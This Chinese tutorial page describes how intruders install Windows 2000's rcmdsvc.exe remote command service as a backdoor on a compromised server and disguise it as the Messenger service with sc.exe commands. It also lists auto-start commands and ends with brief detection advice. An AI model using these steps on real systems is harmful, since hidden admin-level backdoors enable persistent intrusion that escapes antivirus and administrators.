windows自带的rcmd使用方法整理

rcmdsvc.exe是Windows 2000 Resource Kit中的一个小工具,是用来开启Remote Command Service服务的。这个服务开启的端口是445,与Windows 2000系统的Microsoft-DS服务开的端口一样。因为是Microsoft发布的服务,所以根本没有杀毒 软件会认为这是病毒或者木马,因此不少入侵者都把这个服务作为入侵后的后门使用。
下面将从入侵者的角度讲一下这个服务的安装、使用方法以及如何伪装成另外一个服务,从而让大家知道该如何防范。

rcmdsvc.exe安装

假设服务器被入侵后,入侵者把以后需要用到的rcmdsvc.exe等一些工具都放到了C盘根目录下,在cmd窗口里输入:rcmdsvc -install,回车后,即可看到Remote Command Service服务安装成功的提示,
这时在“控制面板”→“管理工具”→“服务”里,就可以看到这个服务了。

从图1可以看到该服务并没有启动,还需要我们来启动该服务,可以使用系统自带的net命令,在cmd窗口里输入:net start rcmdsvc,回车,我们可以看到Remote Command Service服务开始启动和成功。
rcmdsvc.exe使用方法
下面我们就可以用Windows 2000 Resource Kit中的rcmd.exe小工具进行远程连接了,并且连接后拥有管理员权限,可以添加管理员用户。

rcmdsvc.exe伪装

下面该sc.exe(Service Control的缩写)出场了,这个工具是在命令行方式下管理系统中的服务的,在Windows 2000 Resource Kit或者Windows XP中都可以找到该工具。来看一下sc.exe是如何把Remote Command Service服务伪装成Messenger这个服务的。
1.删除Messenger服务。在cmd窗口里输入:sc delete Messenger,回车,可以看到命令完成。
2.把Remote Command Service服务改名为Messenger,在进行这步前,需要重新启动一下。在cmd窗口里输入:sc config rcmdsvc DisplayName= Messenger,回车,可以看到命令完成。这时候我们到“控制面板”→“管理工具”→“服务”里,就可以看到Remote Command Service服务名变成了Messenger。但是“描述”的内容为空。为了使这个服务看起来更“合法”,我们把Messenger的“描述”也加上,在cmd窗口里输入:sc description rcmdsvc 发送和接收系统管理员或者“警报器”服务传递的消息。我们到“服务”里就可以看到rcmdsvc的“描述”被加上了Messenger的描述。只不过服务名称还是rcmdsvc。
3.再重新用net start命令启动一下rcmdsvc服务,就可以用rcmd.exe进行连接了。
为了避免电脑被入侵,把不需要的服务都关闭掉,经常检查一下开启的服务和端口,如果您经过检查发现您的电脑有rcmdsvc服务,或者该服务被伪装成了别的服务,那就要小心了,说明电脑很可能被入侵了,并被别人安装上了杀毒 软件无法查出的“合法”后门

rcmdsvc.exe使用方法:

1、rcmdsvc /install //安装后的服务名为:Remote Command Service (rcmdsvc),建议上传至windows目录
怎么用命令行改服务名和描述:
sc //127.0.0.1 query rcmdsvc //查询整个服务
sc //127.0.0.1 qdescription rcmdsvc //查询服务的描述
sc //127.0.0.1 description rcmdsvc "管理和编录可移动媒
体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和
远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述
D:/pt007/f/Pstools2.11>psservice //127.0.0.1 setconfig rcmdsvc auto //设置服务为自动启动
2、net start rcmdsvc
3、rcmd //127.0.0.1 ver

(0)

相关推荐

  • Windows系统虚拟内存的设置优化方法整理[图文]

    首先得明白什么是虚拟内存,以及虚拟内存有什么作用。 在早期,因为内存价格非常昂贵,所以一般电脑上都不会配置太多。但有时候,我们使用的应用程序所需要的内存量会超过了物理内存量,这时,操作系统就会暂时将不 ...

  • 使用windows自带工具缩小图片尺寸的方法

    现在的数码相机都是好几百万像素,拍出来的照片也是大的吓死人,动不动就好几M,虽然有不少方法都可以达到缩小照片大小的效果,但都需要另装软件,改起来也相对麻烦,现在我就介绍大家一种WINDOWS自带的一种 ...

  • windows自带截图和QQ截图方法!

    windows自带截图方法 01 windows自带截图是全屏截图 要按键盘的 prtsc/sysRq 键 就是F12右边的键!截图的图片就是全屏图片 02 然后再windows自带画图工具或者其它可 ...

  • Win10自带Windows Defender的设置和使用方法

    Windows10系统自带的杀毒软件Windows Defender(窗口后卫),曾用名Microsoft AntiSpyware(反间谍软件),是一个用来移除.隔离和预防间谍软件的程序:Window ...

  • 彻底禁止windows自带防火墙及删除其相关文件的方法

    彻底禁止windows自带防火墙及删除其相关文件的方法

  • 彻底禁止Windows自带防火墙的方法

    彻底禁止Windows自带防火墙的方法

  • windows运行打开服务命令的方法

    windows运行打开服务命令的方法 : 在开始-》运行,输入以下命令 1. gpedit.msc-----组策略 2. sndrec32-------录音机 3. Nslookup-------IP ...

  • windows 7 系统如何进行磁盘碎片整理

    一些下载工具、在线视频播放工具、某些浏览器等对磁盘会有一些“破坏性”影响,会产生一些碎片,碎片多了,会影响系统运行的速度,时间久了,碎片会导致磁盘产生坏块,所以我们必须及时的进行磁盘碎片整理,若是经常 ...

  • 用Windows自带的功能保护秘密不泄漏

    Windows自带的功能,为了方便我们的使用,有自动记录的功能,但是这些功能有些事情也把我们的“行踪”给暴露了,这个时候应该怎么办呢?请看本文为你介绍的八种方法,可以让你使用的电脑了无痕迹。 1.彻底 ...